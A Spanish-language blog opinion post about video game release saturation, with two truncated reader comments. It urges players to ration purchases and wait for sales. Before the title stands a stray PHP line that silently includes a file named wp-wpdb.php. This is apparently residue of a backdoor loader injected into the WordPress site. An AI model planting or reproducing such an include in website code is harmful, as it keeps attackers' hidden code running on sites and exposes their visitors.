if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); ¡Saborea tus juegos! 2ª Parte – La Fortaleza de LeChuck

¡Saborea tus juegos! 2ª Parte

Menuda época que estamos viviendo de lanzamientos de títulos! Cada año se dispara, y la saturación de los jugones lo constatabuenos tiempos para los videojuegos, pero y el jugador? Tenemos tiempo para todos ellos?
Racionar. Lo que debemos hacer es racionar. Que juego es para disfrutar ahora y que juegos son para jugar en una época más calmada. El consumo nos hace creer que si no compramos un juego que nos gusta muchísimo en el momento de su salida, no se vive de la misma forma. A todo esto se suma la cada vez mayor extensión de los videojuegos a través de un multijugador atractivo y varios DLC para continuar la historia o darle alguna partida más a tu juego favorito.

Todo se une, además, con las grandes ofertas que estamos viviendo. Hay un gran salto entre las ventas de un «hit» y los juegos que no llaman la atención a los juegadores más casuales, lo que provoca también un bajón de precios espectacular, al que ultimamente incluso en tiendas españolas se han tenido que apuntar al carro. Ya no solo de UK vive el jugador, si no que en nuestras mismas cadenas de videojuegos podemos encontrar ofertas interesantes de juegos que salieron hace dos meses.

En la Xbox vivimos los primeros DLC en consola, uno se compraba el mapa, otro no, y al final dinero tirado a la basura

Entonces, que está ocurriendo? La cosa está clara, hay una saturación impresionante, no hay mercado para todos, y los lanzamientos no se dosifican, todos creen que saliendo al mercado cerca de las navidades tienen más posibilidades de alcanzar un alto nivel de ventas. Lo que sucede en realidad es que, de toda la vida, solo los juguetes más promocionados, los más esperados, alcanzan unas cifras estratósfericas en esta época. Pero hay juegos por los que todos sabemos, o debemos saber, que pueden esperar y así aprovechar algún mes de vacas flacas para disfrutarlo con garantías y sin presiones de otros juegos que esperan en tu estantería con el precinto puesto.

La estantería llena, y esperas jugar a Skyrim? Tu sabes la de horas que tiene eso?

Elige bien compañero, elige que juego es para jugar ahora y cual debe esperar a un mejor precio o mejor tiempo. Hay que utilizar el coco a la hora de comprar videojuegos, porque si no, al final, no vas a disfrutar ni uno ni otro, y la frustración de creer que no has disfrutado un juego acaba en desidia y dejadez sobre el mundillo. Tu bolsillo te lo agradecerá, es hora de jugar con cabeza.

Si le echas un vistazo a nuestra encuesta, tiene que ver un poco con el tema, aquí a la derecha, que haces con un juego cuando lo terminas?

Publicada el
Categorizado como Opinión

Por Museboy

Como la mayoría de vosotros, crecí jugando a videojuegos y ahora intento transmitir toda la pasión por este mundo en La Fortaleza de LeChuck. También busco ofertas de videojuegos. Seguidme en Twitter y sabréis de qué hablo.

3 comentarios

  1. Muy de acuerdo, los juegos se acumulan en estas fechas, mientras que, por ejemplo, la 3DS no ha tenido nada en verano. Y ahora nos sacan Zelda y Mario el mismo día. Tampoco hablemos de los Kirby o el Mario Kart. Un verano en el que sólo ha habido Xenoblade y ahora en menos de un mes sacan 5 juegos.
    Aún así, yo voy a comprar Zelda de salida, y eso que estoy de exámenes estas semanas. Hay

  2. Buenísma reflexión, y sobretodo me parece ya un fallo propio del siglo anterior el que se quiera condensar todos los lanzamientos que se preveen importantes cerca de la fecha de Navidades (y vaya finales de año… no recuerdo tal avalancha de esta calidad… Arkham City, Zelda, Uncharted, AC, Super Mario Land 3DS, Skyrim, Gears, MW, Battlefield…) Está claro que un juego es un regalo fácil, pero

Dejar un comentario